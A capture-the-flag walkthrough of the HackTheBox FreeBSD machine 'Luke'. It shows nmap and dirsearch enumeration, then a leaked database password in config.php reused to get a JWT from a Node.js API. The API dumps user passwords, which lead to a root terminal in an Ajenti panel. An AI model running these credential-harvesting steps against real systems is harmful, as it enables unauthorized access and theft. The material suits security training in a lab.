Previous Page
Luke Writeup
Introduction :
Luke is a FreeBSD Medium box that was released back in May 2019.
Luke is a FreeBSD Medium box that was released back in May 2019.
As always we begin our Enumeration using Nmap to enumerate opened ports. We will be using the flags -sC for default scripts and -sV to enumerate versions.
[ 85.171.153.138 ] [ /dev/pts/0 ] [Nextcloud/blog]
→ sudo nmap -vvv -sTU -p- 10.10.10.137 --max-retries 0 -Pn --min-rate=500 | grep Discovered
Discovered open port 80/tcp on 10.10.10.137
Discovered open port 22/tcp on 10.10.10.137
Discovered open port 21/tcp on 10.10.10.137
Discovered open port 3000/tcp on 10.10.10.137
Discovered open port 8000/tcp on 10.10.10.137
[ 85.171.153.138 ] [ /dev/pts/0 ] [Nextcloud/blog]
→ nmap -sCV -p21,22,80,3000,8000 10.10.10.137
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-23 10:21 BST
Nmap scan report for 10.10.10.137
Host is up (0.093s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3+ (ext.1)
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 2 0 0 512 Apr 14 2019 webapp
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.14.15
| Logged in as ftp
| TYPE: ASCII
| No session upload bandwidth limit
| No session download bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3+ (ext.1) - secure, fast, stable
|_End of status
22/tcp open ssh?
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
80/tcp open http Apache httpd 2.4.38 ((FreeBSD) PHP/7.3.3)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.38 (FreeBSD) PHP/7.3.3
|_http-title: Luke
3000/tcp open http Node.js Express framework
|_http-title: Site doesn't have a title (application/json; charset=utf-8).
8000/tcp open http Ajenti http control panel
|_http-title: Ajenti
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 178.00 seconds
Our nmap scan picked up port 21 with anonymous login so let's investigate it:
[ 10.10.14.15 ] [ /dev/pts/0 ] [Nextcloud/blog]
→ ftp 10.10.10.137
Connected to 10.10.10.137.
220 vsFTPd 3.0.3+ (ext.1) ready...
Name (10.10.10.137:nothing): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 0 0 512 Apr 14 2019 webapp
226 Directory send OK.
ftp> cd webapp
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-r-xr-xr-x 1 0 0 306 Apr 14 2019 for_Chihiro.txt
226 Directory send OK.
ftp> get for_Chihiro.txt
local: for_Chihiro.txt remote: for_Chihiro.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for for_Chihiro.txt (306 bytes).
226 Transfer complete.
306 bytes received in 0.00 secs (1.7903 MB/s)
ftp> exit
221 Goodbye.
[ 10.10.14.15 ] [ /dev/pts/0 ] [Nextcloud/blog]
→ mkdir ~/_HTB/Luke && mv for_Chihiro.txt ~/_HTB/Luke
[ 10.10.14.15 ] [ /dev/pts/0 ] [Nextcloud/blog]
→ cd ~/_HTB/Luke && file for_Chihiro.txt && cat for_Chihiro.txt
for_Chihiro.txt: ASCII text
Dear Chihiro !!
As you told me that you wanted to learn Web Development and Frontend, I can give you a little push by showing the sources of
the actual website I've created .
Normally you should know where to look but hurry up because I will delete them soon because of our security policies !
Derry
looks like they have a bunch of sourcecode but not available through anonymous login via ftp, so we'll investigate port 80 instead which is a bootstrap4 template page:
Taking a look at port 3000 and 8000 are both more interesting:
Which reveals us an Ajenti login webpage, and the node.js express framework JSON webapp our nmap scan picked up earlier. so let's investigate with gobuster what lies on the previous port 80:
[ 10.10.14.15/23 ] [ /dev/pts/3 ] [~]
→ dirsearch -u http://10.10.10.137 -e php
git clone https://github.com/maurosoria/dirsearch.git
dirsearch -u <url> -e <php,txt,html,js> -t 50 -x 500
_|. _ _ _ _ _ _|_ v0.3.9
(_||| _) (/_(_|| (_| )
Extensions: php | HTTP method: get | Threads: 10 | Wordlist size: 6046
Error Log: /home/nothing/Desktop/Tools/dirsearch/logs/errors-20-04-24_09-04-58.log
Target: http://10.10.10.137
[09:04:58] Starting:
[09:05:02] 403 - 213B - /.hta
[09:05:02] 403 - 220B - /.ht_wsr.txt
[09:05:02] 403 - 222B - /.htaccess-dev
[09:05:02] 403 - 224B - /.htaccess-local
[09:05:02] 403 - 224B - /.htaccess-marco
[09:05:02] 403 - 222B - /.htaccess.BAK
[09:05:02] 403 - 223B - /.htaccess.bak1
[09:05:02] 403 - 222B - /.htaccess.old
[09:05:02] 403 - 223B - /.htaccess.orig
[09:05:02] 403 - 225B - /.htaccess.sample
[09:05:02] 403 - 223B - /.htaccess.save
[09:05:02] 403 - 222B - /.htaccess.txt
[09:05:02] 403 - 224B - /.htaccess_extra
[09:05:02] 403 - 223B - /.htaccess_orig
[09:05:02] 403 - 221B - /.htaccess_sc
[09:05:02] 403 - 221B - /.htaccessBAK
[09:05:02] 403 - 221B - /.htaccessOLD
[09:05:02] 403 - 222B - /.htaccessOLD2
[09:05:02] 403 - 219B - /.htaccess~
[09:05:02] 403 - 217B - /.htgroup
[09:05:02] 403 - 222B - /.htpasswd-old
[09:05:02] 403 - 223B - /.htpasswd_test
[09:05:02] 403 - 219B - /.htpasswds
[09:05:02] 403 - 217B - /.htusers
[09:05:25] 200 - 202B - /config.php
[09:05:27] 301 - 232B - /css -> http://10.10.10.137/css/
[09:05:34] 200 - 1KB - /gulpfile.js
[09:05:36] 200 - 3KB - /index.html
[09:05:38] 301 - 231B - /js -> http://10.10.10.137/js/
[09:05:39] 200 - 1KB - /LICENSE
[09:05:40] 200 - 2KB - /login.php
[09:05:41] 401 - 381B - /management
[09:05:41] 401 - 381B - /management/
[09:05:42] 301 - 235B - /member -> http://10.10.10.137/member/
[09:05:42] 200 - 216B - /member/
[09:05:46] 200 - 1KB - /package.json
[09:05:51] 200 - 4KB - /README.md
Task Completed
Here the interesting thing is config.php
[ 10.10.14.15/23 ] [ /dev/pts/3 ] [~]
→ curl -sk http://10.10.10.137/config.php
$dbHost = 'localhost';
$dbUsername = 'root';
$dbPassword = 'Zk6heYCyv6ZE9Xcg';
$db = "login";
$conn = new mysqli($dbHost, $dbUsername, $dbPassword,$db) or die("Connect failed: %s\n". $conn -> error);
Which gives us credentials for a database on localhost root:Zk6heYCyv6ZE9Xcg. Now back on port 3000 the error message was "auth token is not supplied" Therefore we could use curl to supply the needed parameters of said token, whose password is the one we found earlier, but we had to guess the username, which was "admin"
As you can see the credentials we found do not work on the login page of port 8000, so we'll use curl on the jwt application itself, especially on the login page:
[ 10.10.14.15/23 ] [ /dev/pts/3 ] [~]
→ dirsearch -u http://10.10.10.137:3000 -e php,html,txt
git clone https://github.com/maurosoria/dirsearch.git
dirsearch -u -e -t 50 -x 500
_|. _ _ _ _ _ _|_ v0.3.9
(_||| _) (/_(_|| (_| )
Extensions: php, html, txt | HTTP method: get | Threads: 10 | Wordlist size: 6748
Error Log: /home/nothing/Desktop/Tools/dirsearch/logs/errors-20-04-24_09-24-12.log
Target: http://10.10.10.137:3000
[09:24:12] Starting:
[09:24:58] 200 - 13B - /login
[09:24:58] 200 - 13B - /Login
[09:24:59] 200 - 13B - /login/
[09:25:21] 200 - 56B - /users
[09:25:21] 200 - 56B - /users/
[09:25:21] 200 - 56B - /users/admin
[ 10.10.14.15/23 ] [ /dev/pts/3 ] [~]
→ curl -XPOST http://10.10.10.137:3000/login -H 'Content-Type: application/json' -d '{"username":"root","password":"Zk6heYCyv6ZE9Xcg"}'
Forbidden
[ 10.10.14.15/23 ] [ /dev/pts/3 ] [~]
→ curl -XPOST http://10.10.10.137:3000/login -H 'Content-Type: application/json' -d '{"username":"admin","password":"Zk6heYCyv6ZE9Xcg"}'
{"success":true,"message":"Authentication successful!","token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTg3NzE3MTg5LCJleHAiOjE1ODc4MDM1ODl9.atFsMshB6MFx3_wQIwgeqTsNgOobJHjLDQeK6QnzVhM"}
And there we have it ! Now we get a JWT token after logging in:
{"success":true,"message":"Authentication successful!","token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTg3NzE3MTg5LCJleHAiOjE1ODc4MDM1ODl9.atFsMshB6MFx3_wQIwgeqTsNgOobJHjLDQeK6QnzVhM"}
After reading JWT's documentation, In order to authenticate we add the following header to the get request on to view the contents of /users
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTg3NzE3MTg5LCJleHAiOjE1ODc4MDM1ODl9.atFsMshB6MFx3_wQIwgeqTsNgOobJHjLDQeK6QnzVhM
So we use it to list the users on the box:
[ 10.10.14.15/23 ] [ /dev/pts/3 ] [~]
→ curl -XPOST http://10.10.10.137:3000/login -H 'Content-Type: application/json' -d '{"username":"admin","password":"Zk6heYCyv6ZE9Xcg"}'
{"success":true,"message":"Authentication successful!","token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTg3NzE3NzQ2LCJleHAiOjE1ODc4MDQxNDZ9.og7r_8WkiyA2JbbIoyOsiYRhKTyLl17oPAIOMxuq3wI"}%
[ 10.10.14.15/23 ] [ /dev/pts/3 ] [~]
→ curl -X GET -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTg3NzE3NzQ2LCJleHAiOjE1ODc4MDQxNDZ9.og7r_8WkiyA2JbbIoyOsiYRhKTyLl17oPAIOMxuq3wI' http://10.10.10.137:3000/users
[{"ID":"1","name":"Admin","Role":"Superuser"},{"ID":"2","name":"Derry","Role":"Web Admin"},{"ID":"3","name":"Yuri","Role":"Beta Tester"},{"ID":"4","name":"Dory","Role":"Supporter"}]
which we can use to list each of their passwords:
[ 10.10.14.15/23 ] [ /dev/pts/3 ] [~]
→ curl -X GET -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTg3NzE3NzQ2LCJleHAiOjE1ODc4MDQxNDZ9.og7r_8WkiyA2JbbIoyOsiYRhKTyLl17oPAIOMxuq3wI' http://10.10.10.137:3000/users
[{"ID":"1","name":"Admin","Role":"Superuser"},{"ID":"2","name":"Derry","Role":"Web Admin"},{"ID":"3","name":"Yuri","Role":"Beta Tester"},{"ID":"4","name":"Dory","Role":"Supporter"}]%
[ 10.10.14.15/23 ] [ /dev/pts/3 ] [~]
→ curl -X GET -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTg3NzE3NzQ2LCJleHAiOjE1ODc4MDQxNDZ9.og7r_8WkiyA2JbbIoyOsiYRhKTyLl17oPAIOMxuq3wI' http://10.10.10.137:3000/users/Dory
{"name":"Dory","password":"5y:!xa=ybfe)/QD"}%
[ 10.10.14.15/23 ] [ /dev/pts/3 ] [~]
→ curl -X GET -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTg3NzE3NzQ2LCJleHAiOjE1ODc4MDQxNDZ9.og7r_8WkiyA2JbbIoyOsiYRhKTyLl17oPAIOMxuq3wI' http://10.10.10.137:3000/users/Derry
{"name":"Derry","password":"rZ86wwLvx7jUxtch"}%
[ 10.10.14.15/23 ] [ /dev/pts/3 ] [~]
→ curl -X GET -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTg3NzE3NzQ2LCJleHAiOjE1ODc4MDQxNDZ9.og7r_8WkiyA2JbbIoyOsiYRhKTyLl17oPAIOMxuq3wI' http://10.10.10.137:3000/users/Yuri
{"name":"Yuri","password":"bet@tester87"}%
[ 10.10.14.15/23 ] [ /dev/pts/3 ] [~]
→ curl -X GET -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTg3NzE3NzQ2LCJleHAiOjE1ODc4MDQxNDZ9.og7r_8WkiyA2JbbIoyOsiYRhKTyLl17oPAIOMxuq3wI' http://10.10.10.137:3000/users/Admin
{"name":"Admin","password":"WX5b7)>/rp$U)FW"}
We use derry's credentials to login :
And we are logged in !
From there we need to go to config.json where the ajenti credentials are:
root:KpMasng6S5EtTy9Z
Once logged in we are able to get more information about the box which is a FreeBSD 12.0-RELEASE amd64 machine. From there we simply head over to the terminal tab, from which we can execute commands as the root user, and therefore print out both flags.
Here we can see the progress graph :
Donate XMR: 8AUYjhQeG3D5aodJDtqG499N5jXXM71gYKD8LgSsFB9BUV1o7muLv3DXHoydRTK4SZaaUBq4EAUqpZHLrX2VZLH71Jrd9k8
Contact: nihilist@contact.nowhere.moe (PGP)
